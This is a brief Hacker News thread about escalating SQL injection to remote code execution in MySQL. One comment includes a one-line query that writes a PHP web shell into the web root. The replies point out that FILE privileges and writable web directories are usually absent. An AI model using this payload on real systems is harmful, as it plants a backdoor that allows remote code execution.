Hacker News new | ask | show | jobs
by mappu 4263 days ago
SQL injection alone is often enough to get you RCE if your MySQL account has FILE permissions enabled (often true). Something like `SELECT "<?php eval($_GET['x'])" INTO OUTFILE /srv/www/backdoor.php`.
2 comments
meowface 4263 days ago
>(often true)

I don't think it's that often. By default, a new MySQL user will not have FILE privileges granted.

Most of the time you see this due to the developer being lazy and just using the "root" MySQL user.

link
Ded7xSEoPKYNsDd 4263 days ago
This would also depend on hilariously bad permissions on /srv/www that allow the mysql user to create files there.
link